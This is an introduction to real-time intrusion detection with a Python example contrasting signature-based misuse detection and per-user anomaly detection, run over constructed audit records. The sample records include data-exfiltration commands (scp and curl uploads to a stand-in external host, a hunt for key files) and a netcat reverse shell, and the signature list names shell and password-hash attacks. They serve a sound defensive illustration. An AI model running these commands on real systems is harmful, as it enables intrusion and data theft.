Real-Time Intrusion Detection with Emphasis on Insider Attacks

Securing cyberspace against attack is critical to the economy and well-being of any country, and during the past few years threats to it have risen dramatically. It is impossible to close every security loophole in a computer system by deploying firewalls or applying cryptographic techniques alone, so intrusion detection has emerged as a key technique for cyber security. Currently there are more than 100 commercial tools and research prototypes for intrusion detection, and these can be broadly classified as either misuse or anomaly detection systems. Misuse detection looks for specific signs of attack by comparing current activity against a database of known attack patterns; anomaly detection builds a baseline of normal behaviour from a model of the system and signals significant deviations from that baseline as intrusions. Both approaches rely on audit trails, which can be very large. Moreover, they have conventionally operated off-line, after the fact, and so offer little strong deterrence while an attack is in progress.
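The two detection styles contrasted above, shown side by side over a small constructed audit trail. This is an added illustration, not code from the paper: the audit records, the three-entry signature database, the per-user command-frequency baseline with Laplace smoothing, the five-command sliding window and the two-bit alert margin are all assumptions chosen for the example. The anomaly detector consumes records one at a time, as a real-time system would, rather than scanning a stored audit trail. In the sample data a user's exfiltration sequence matches no signature but does depart from that user's baseline, while a second user's reverse shell matches a signature outright, which is why the two approaches are usually treated as complementary.

```python
"""Misuse vs. anomaly detection over a constructed audit trail (added example)."""
import math
from collections import Counter, deque

# Constructed audit records (user, command line); not from any real system.
TRAINING = [
    ("alice", "ls -la"), ("alice", "cat notes.txt"), ("alice", "vim main.c"),
    ("alice", "git status"), ("alice", "make"), ("alice", "ls"),
    ("alice", "grep -r TODO src"), ("alice", "git diff"), ("alice", "ls src"),
    ("alice", "cat Makefile"), ("alice", "vim Makefile"), ("alice", "make test"),
    ("alice", "ls build"), ("alice", "git commit -a"), ("alice", "cat README"),
    ("alice", "grep main src/main.c"), ("alice", "ls -l"), ("alice", "vim src/io.c"),
    ("alice", "cat log.txt"), ("alice", "ls"),
]
LIVE = [
    ("alice", "ls"), ("alice", "cat notes.txt"), ("alice", "vim main.c"),
    ("alice", "git pull"), ("alice", "ls src"),
    # insider exfiltration: no signature matches, but every command is new for alice
    ("alice", "scp -r /srv/finance ext.example.net:/tmp"),
    ("alice", "tar czf /tmp/f.tgz /srv/finance"),
    ("alice", "find / -name '*.key'"),
    ("alice", "scp /tmp/f.tgz ext.example.net:/tmp"),
    ("alice", "curl -T /tmp/f.tgz https://ext.example.net/up"),
    # known attack pattern from a user with no baseline at all
    ("bob", "nc -e /bin/sh 10.0.0.5 4444"),
]

SIGNATURES = {  # constructed toy signature database (assumption)
    "nc -e": "netcat reverse shell",
    "chmod u+s": "setuid bit set on binary",
    "/etc/shadow": "access to password hashes",
}
WINDOW = 5         # commands per sliding window (assumption)
MARGIN_BITS = 2.0  # how far above the baseline mean a window must score (assumption)


def misuse_detect(records, signatures=SIGNATURES):
    """Misuse detection: flag any command line containing a known-bad pattern."""
    return [(user, cmd, name)
            for user, cmd in records
            for sig, name in signatures.items() if sig in cmd]


def _name(cmd):
    """First token of a command line, or '' for an empty line."""
    return (cmd.split() or [""])[0]


class UserProfile:
    """Baseline of one user's command-name frequencies. Laplace smoothing gives
    never-seen commands a small but finite probability instead of zero."""

    def __init__(self, commands):
        self.counts = Counter(_name(c) for c in commands)
        # one extra smoothed slot is reserved for the "unknown command" event
        self.denominator = sum(self.counts.values()) + len(self.counts) + 1
        self.mean_surprisal = sum(self.surprisal(c) for c in commands) / len(commands)

    def surprisal(self, cmd):
        """-log2 P(command name) under the smoothed baseline; higher means rarer."""
        count = self.counts.get(_name(cmd), 0)
        return -math.log2((count + 1) / self.denominator)


def build_profiles(training):
    """One UserProfile per user seen in the training records."""
    per_user = {}
    for user, cmd in training:
        per_user.setdefault(user, []).append(cmd)
    return {user: UserProfile(cmds) for user, cmds in per_user.items()}


def anomaly_detect(records, profiles, window=WINDOW, margin=MARGIN_BITS):
    """Anomaly detection, one record at a time: keep the last `window` surprisal
    values per user and alert when their mean exceeds that user's baseline mean
    by `margin` bits. Returns (user, record index, score) tuples."""
    recent = {user: deque(maxlen=window) for user in profiles}
    alerts = []
    for index, (user, cmd) in enumerate(records):
        profile = profiles.get(user)
        if profile is None:
            continue  # no baseline for this user, so nothing to deviate from
        recent[user].append(profile.surprisal(cmd))
        if len(recent[user]) < window:
            continue  # not enough history yet
        score = sum(recent[user]) / window
        if score > profile.mean_surprisal + margin:
            alerts.append((user, index, round(score, 2)))
    return alerts


def run(training=TRAINING, live=LIVE):
    """Run both detectors over the live records; returns (misuse_alerts, anomaly_alerts)."""
    profiles = build_profiles(training)
    return misuse_detect(live), anomaly_detect(live, profiles)


if __name__ == "__main__":
    misuse, anomaly = run()
    for user, cmd, name in misuse:
        print(f"MISUSE   {user}: {name!r} matched in {cmd!r}")
    for user, index, score in anomaly:
        print(f"ANOMALY  {user}: window ending at record {index} scored {score} bits")
```

Only the last window of alice's session trips the anomaly detector, once all five commands in it are unseen; the earlier windows that mix old and new commands stay under the threshold, which is the usual trade-off between window length and detection latency. bob is never scored by the anomaly detector because he has no baseline, so the signature match is the only reason his reverse shell is reported.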
